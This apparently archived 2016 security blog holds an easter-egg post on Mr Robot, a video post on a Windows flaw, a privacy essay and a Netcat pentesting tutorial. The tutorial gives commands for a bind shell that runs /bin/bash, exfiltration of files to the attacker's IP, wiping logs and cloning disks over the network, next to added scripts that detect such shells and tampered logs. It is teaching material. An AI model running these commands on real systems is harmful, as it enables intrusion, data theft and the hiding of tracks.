Thursday, July 14, 2016

Mr Robot Season 2 Easter Eggs: Ransomware Message Revealed and Decoded!

Hello folks!  I'm sure you have heard about the most popular TV show of 2015 and perhaps of 2016, the multiple award-winning TV sensation Mr Robot.  I don't like TV shows and don't watch TV at all, but I got caught up with Season 1 because of the hacking techniques the main character uses, which sound and seem pretty legitimate (as do the terms).  So, Season 2 took off yesterday, but there has been a lot of work done on the Internet about it before then, not only on their website but also outside of it, including Easter eggs!  Easter eggs are "secrets" buried in layers for people to find.  I have stumbled upon a few great surprises, but one was worth noting.  After they released Episode 1 before the air date, it kept me wondering...

Episode 1 concludes with a ransomware attack on Evil Corp banks which leaves their computers inoperable.  I could take a screenshot of it and decided to investigate the victim's IP address (which is public, by the way) and found something interesting.  There seemed to be a message buried behind the timer, which resets every time you open the website, but what if I could stop the timer and let it go to 00:00:00? What would happen when the timer reaches 0?  Watch the video, learn a little about JS and base64 encoding (where the message is buried), grab some popcorn and enjoy the video.... Dubstep style!


How Can a 10 Year Old Have Administrator Access to Your Fortified Windows 8 and 10 Computer

Hello there. I have been a bit busy working and on side projects, so I would like to share with you some old work which I haven't shared on my blog before, even though I have done a similar video with Windows 7.  This shows that the principle of this flaw does not rely on the software but on its design.  Since Micro$oft is too busy fixing more "relevant" bugs, I am posting this only for educational purposes.  I am not responsible for, nor do I condone, illegal acts.


Now, watch and enjoy!

Windows 8:




Windows 10:


Wednesday, April 20, 2016

Old-school Pentesting with Netcat


I have been asked to write an article for PentestMag and here it is. Enjoy it.

Netcat was created by “Hobbit” and its first stable release was in 2007. We all know Netcat’s legendary reputation as the “Swiss army knife” of pentesting, but do we really know everything about it? We have all used Netcat for one thing or another, but the truth is that Netcat can be used for a plethora of things!

If you have done some sort of security certification or simply taken some cyber-security courses, you will have come across the famous phases of “hacking”:



1. Reconnaissance

2. Scanning

3. Gaining Access

4. Maintaining Access

5. Covering Tracks

We have all used Netcat for some of these functions in many ways. We may even have tried to make a chat client or transferred files over a network; but did we ever use Netcat to its fullest, at every phase of pentesting? Let’s check:


Step 1: Reconnaissance

We can perform banner grabbing in order to determine the web server type and version, as well as the version of any other service. Sure, we can do this with Telnet, but Netcat does not alter the stream of data and, unlike Telnet, supports UDP as well as TCP. The command for Netcat banner grabbing is the following:



nc [IP address] [port number]



A practical example would be:



Please note that this method is very useful because it tells us not only the web application’s server but also its version, in which case you might want to consider skipping step 2.


You can also try entering HEAD / OPTIONS to get some response headers stating the scripting language which the web server is primarily written in (in this case PHP):




If we try the same syntax with a different port number, we will get interesting results if the ports are open:




Step 2: Scanning



If we want to scan specific ports in order to find potentially sensitive information exposed through outdated software and/or web application versions on the server, we can use the following command:


nc -vv -n -z -w1 [IP-address] [port number range]



In the screenshot we can see a clear example:



This is what every flag does: 


-vv: display more verbose output.

-n: run the scan without resolving hostnames.

-z: run the scan without sending any data to the target system.

-w1: wait no more than 1 second for each connection.

IP address: the IP address of the host we want to scan.

Port Numbers: a range can be used, as well as individual ports separated by commas.

With this method, we can simply figure out which ports are open and which are closed by looking at the connection status (closed/open). If you would like more information about a certain port, you can try the banner grabbing technique to figure out what the version is.



Step 3: Gaining Access

How good is it to have the whole system infrastructure layout, and to know they are using an out-of-date and vulnerable version of some software, if we can’t show the evidence by gaining access to the system? One very common way for Netcat to give access to a system is to send a crafted file which remotely creates a Netcat listener on a given port for the attacker to connect to. Note that the target system also has to have Netcat installed for this to work, which can be accomplished by:



1) Social Engineering the victim into installing it.

2) By performing phishing.

3) Physical access to the system.


Then, once the listener is running, the attacker can easily connect to the listening port and IP of the target machine and remotely execute code. The snippet is as easy as this:


(Target’s machine)

nc -l -p [listening port] -v -e /bin/bash


 (Pentester’s machine)

nc [Target IP] [listening port]



Besides setting up a bind shell on the client, you can also use Netcat to set up a reverse shell, which is useful when working with a NATed system. Unlike ports, a reverse shell assigns a connection to the user (attacker) through a shell. Note: To attack the target’s machine which is behind a NAT, port-forwarding must be set up on the target’s machine IP and port.
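From the defender's side, the flags used above are what give these shells away in a process listing. The following is an added example, not part of the original article: it classifies Netcat processes by their flags. The `flag_netcat` name and the sample process lines are constructed for illustration.

```shell
#!/bin/sh
# Added example (not from the article): triage netcat processes by their flags.
# Input: lines of "PID USER ARGS..." as printed by `ps -eo pid,user,args`.
# -e/-c (--exec/--sh-exec) attach a program to the socket; -l listens.
# Some OpenBSD nc builds use -c for TLS, so treat hits as leads to review.

flag_netcat() {
    awk '
    {
        n = split($3, parts, "/")          # basename of the executable
        if (parts[n] !~ /^(nc|ncat|netcat|nc\.traditional|nc\.openbsd)$/) next
        exec_flag = 0; listen = 0
        for (i = 4; i <= NF; i++) {
            if ($i == "--exec" || $i == "--sh-exec") exec_flag = 1
            else if ($i == "--listen")               listen = 1
            else {
                # bundled short flags such as -lvp or -e
                if ($i ~ /^-[A-Za-z]*[ec]/) exec_flag = 1
                if ($i ~ /^-[A-Za-z]*l/)    listen = 1
            }
        }
        if (exec_flag && listen) kind = "bind-shell"
        else if (exec_flag)      kind = "reverse-shell"
        else if (listen)         kind = "listener"
        else next
        printf "%s pid=%s user=%s\n", kind, $1, $2
    }'
}

# Constructed sample of `ps -eo pid,user,args` output (not real data).
SAMPLE_PS='  412 www-data nc -l -p 4444 -v -e /bin/bash
  977 alice    /usr/bin/ncat --exec /bin/sh 203.0.113.7 443
 1203 bob      nc -vlp 1337
 1310 carol    nc -vv -n -z -w1 192.0.2.10 20-25
 1422 dave     grep -e nc /var/log/syslog'

printf '%s\n' "$SAMPLE_PS" | flag_netcat
```

On a live host the same function can be fed with `ps -eo pid,user,args | flag_netcat`; a plain listener is not malicious by itself, so each hit still needs review.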




Step 4: Maintaining Access

Netcat also has great functionality which allows you to create backdoors in order to come back to the system later. We have seen how to create a listener, which gives the chance of having a backdoor for remote execution as well as for retrieving files from the target machine; but how about copying files or exfiltrating data?

For this test, we used corporate_secrets.txt as the file we think the target machine has. To copy from the target’s machine to the Pentester’s machine, simply do the following:

(in target’s machine)

cat [file_to_exfiltrate] | nc [IP of Pentester] [Port]



(in Pentester’s machine)

nc -l -n -vv -p 1337 > [file_to_exfiltrate]



Visual Example:



Copying files to the target’s system is also possible:

(Target’s machine)

nc -lp 1337 > [file]



(Pentester’s machine)

nc [IP of target] 1337 < [file]



Visual Example :



Step 5: Covering Tracks



We know that a hack is not successful if we leave tracks all over the place. In this case, we can even delete logs by echoing a blank space to the file, overwriting it with a chunk of data, or copying a fake log file over it on the target system.



echo " " > log.txt


nc [victim IP] [port number] > log file.
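Each of the three wipes described above breaks the append-only property of a log, which is something a defender can check. The following is an added example, not part of the original article: it records a size and SHA-256 baseline and later verifies that the old content is still the prefix of each log. The function names and file contents are constructed, and `sha256sum` and `head -c` are assumed to be available.

```shell
#!/bin/sh
# Added example (not from the article): detect wiped or replaced logs.
# An append-only log may grow, but its old bytes must never change.
# Baseline line format: "<bytes> <sha256> <path>".

snapshot_logs() {
    for f in "$@"; do
        printf '%s %s %s\n' "$(wc -c < "$f" | tr -d ' ')" \
            "$(sha256sum < "$f" | cut -d' ' -f1)" "$f"
    done
}

verify_logs() {   # $1 = baseline file; prints one finding per suspect log
    while read -r old_size old_hash path; do
        if [ ! -f "$path" ]; then
            echo "MISSING $path"; continue
        fi
        new_size=$(wc -c < "$path" | tr -d ' ')
        if [ "$new_size" -lt "$old_size" ]; then
            echo "SHRANK $path"      # also fires on rotation: exclude rotated logs
        elif [ "$(head -c "$old_size" "$path" | sha256sum | cut -d' ' -f1)" \
                != "$old_hash" ]; then
            echo "REWRITTEN $path"   # old prefix no longer matches the baseline
        fi
    done < "$1"
    return 0
}

demo_log_tamper() {   # constructed logs in a temporary directory
    d=$(mktemp -d)
    for name in auth.log app.log web.log; do
        printf 'line1\nline2\n' > "$d/$name"
    done
    snapshot_logs "$d/auth.log" "$d/app.log" "$d/web.log" > "$d/baseline"
    echo 'line3' >> "$d/auth.log"                   # normal append: no finding
    echo " " > "$d/app.log"                         # the wipe shown above
    printf 'fake1\nfake2\nfake3\n' > "$d/web.log"   # fake log copied over
    verify_logs "$d/baseline" | sed "s|$d/||"
    rm -rf "$d"
}

demo_log_tamper
```

The baseline only helps if it is stored where the account that can write the logs cannot also rewrite it, for example on a separate log host.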


Tips and Tricks



Chat Client



In one terminal, type:

nc -vlp 1337



In the other terminal type:

nc [IP of 1st terminal] 1337

Start typing



Visual Example:




Send spoofed HTTP Requests



nc [domain.com] 80



GET / HTTP/1.1

Host: domain.com

User-Agent: Who-Cares

Referer: Noone.com

[Press Enter twice]



Visual Example:



Make an instant Web Server with Netcat


while true; do nc -lp 80 -q 1 < test.html; done



Visual Example:



Cloning Hard Drive Partitions over the network



dd if=/dev/sda | nc [IP address] 1337



Conclusion:


Netcat is more than simply a tool. The phases of hacking and penetration testing are simple, but with Netcat they can be carried out and seen as even simpler than they really are. Netcat has been in the pentesting industry for decades, and this article helps you keep in touch with old and still reliable ways of taking over systems. It is true that with the help of Metasploit and the Meterpreter it is also possible to create backdoors and do more post-exploitation techniques, but that is beyond the scope of this article. Its purpose was to show that Netcat is still a great and simple way to do all phases of hacking.

Thursday, February 4, 2016

How Smart-Gadgets Outsmart Humans

As the Internet of Things (IoT) develops more and more within our daily lives, it is important to notice where all of this is heading.  Twenty years ago, we did not have nearly the same exposure to technology gadgets as we have now.  Without realizing it, we have become a lot more dependent on having our electronics and "wearables" tell us the weather, dictate our relationships, and tell us exactly where to go, how to get there and how long it will take us to get to a specific place.  Also, we rely on them to tell us more personal data, such as our calorie intake, how much we burnt and how much more we have to eat in order to be at the "ideal weight"; whether we have slept enough, what time we woke up, what we typically eat, etc.  Even though some of the personal data we give up might help us to get where we want to go and be, we have to ask ourselves: how did our grandparents manage their weight, routes, calorie intake/outtake, weather predictions and relationships? Have we got any better personally than our ancestors? Why are we relying so much on our "smart-gadgets" when people did not have those 20 years ago and yet they still lived in harmony and peace with themselves? How come there was less obesity before than now even though we have "smart" devices micro-managing what we eat and our calorie count?


We have to realize that our lives have been changed unwillingly.  We have to face the reality that we are slaves to a system which condemns us to submit more and more to a machine of control. Living in an era where whoever has the information has control over the other, it seems we are not only losing our information but also giving it out for free and even paying for it.  Jeremie Zimmermann once said that: "If someone knows everything about you and yet you don't know anything about such person, he has tremendous power over you". The whole concept of being smart is not relying on smart wearable gadgets which send our information out to third parties so that we achieve a level of popularity in this naive world by posting it on Facebook, or to feed our commodities, but controlling what we share, because we should have control over ourselves rather than exposing our "private maze".  The main problem is that people do not realize how exposing all this personal information puts them in danger, and it enforces linking one piece of information to another in order to make a profile of us (called linkability).  We have to train our brains to think this way because every time we post something on social media, every swipe of our club cards that is linked back to us through a debit card and gets connected with every news feed we read, every website we visit, every call we make, every transmission we emit from our "smart" devices, etc. poses a danger to our privacy.  We need to stop and think before we share private information over the Internet and ask whether it is worth it; sacrificing private chunks of our lives for a bit of fun, commodity, or simply a few cents off a purchase does not make us better people.

The problem resides in private data being converted into useful, profitable information.  Nowadays, lots of people do not know the difference between public and private data, not only because our smart gadgets have crossed the line between them but also because we do it all the time without thinking twice about it. The worst thing of all is that people are always willing to make that trade-off because they do not see it as a choice. What is odd about it is that this does not have to happen within a secret society, with secret service agents sharing our data in a shady way; it is done publicly, and many of us even know and agree without knowing about it. The worst of all is that most people don't even realize what they are sacrificing in the first place.  Every decision point in our lives is a trade-off.



We have heard of or at least know about them. These are companies that became giants because of the gathering of our personal data (also called "data-mining") and sharing it with third parties and even governments.  Not only government agencies but also Big Data conglomerate machines such as Google, Facebook, Apple, LinkedIn and Amazon (to name a very few) acquire our data every single day and sell it to the highest bidder. Snowden's leaked articles showed how these companies allowed the government to sniff directly from their servers' backbone and collect our data as well as analyze it and store it indifferently without a court order.  Our data (personal and private) has value.  Maybe we do not value our data as much as we should but, believe me, advertisement, medical, government agencies and insurance companies do.  For example, advertisement companies want our personal data so they can use it for targeted advertisement. Result: we buy more. Conclusion: the country gets richer in debt, which, after all, we will end up paying with our taxes. Insurance companies want it so they can predict (over a short and a long period of time) whether a particular person will be eligible for medical coverage several years from now and whether he is insurable. Result: we might not only end up losing our medical insurance but also be rejected by other insurance entities; or worse, be left with no choice but to join an insurance company with high costs. Medical companies would use it to determine whether in the near future it would be cheaper for them to invest in you with a medicine pill or treatment, or simply let you die if you suffer a stroke or cancer, by simply relying on statistical charts.  With enough data, they can even predict when you'll have the stroke and how to treat you without even asking or making you sign anything.

Pedometers help us statistically to control our weight, but people before then did not do that and the obesity rate was way lower than it is now.  At the same time, Big Data companies use this data to help an insurance company determine whether to cover you and for how long by looking at your FitBit's heart rate, how long and when you work out, what you eat, how many calories you burn/take in, how many glasses of water you drink, etc., and the worst part is that we put all that information there for them.


Microsoft, Apple and Google have created gadgets in many forms, purposes and sizes which will keep shaping the way we live our lives. Every new product they release gets more intrusive and accurate as well as more convenient for the user.  After all, they have to convince the user to buy it and use it every day, all the time, so they can have more control over our lives. I've always loved technology but I also like to have control over my actions.  Now we face a situation where our actions are becoming a problem because smart-gadgets have, without our being conscious of it, taken over decision power.  The problem will always be choice.  It is your duty to find it, understand it, analyze it and make a smart decision from it. We need to analyze whether we are better off the old-fashioned way or relying on a cheap piece of plastic and a programmable chip which can actually be hacked and make your life worse. The answer is to go hybrid, but the key is to know when to rely on technology and when it's a better idea to go old-fashioned.  Believe me, I love technology but I also like to have control over my information. Now, that is me. It is up to you to decide if you want to share personal information and/or how much information you are willing to share with them. As long as people keep sharing their information, these big conglomerates will still be fed and will become stronger until one day we wake up with no control over our lives.  By helping little by little, we can finally make a change. We need to weigh the costs/risks/benefits and show these big and greedy companies who really is the smart one because ultimately, whoever has control over all information has control over the world.



Sources:

Term of linkability
Movie - Terms and Conditions May Apply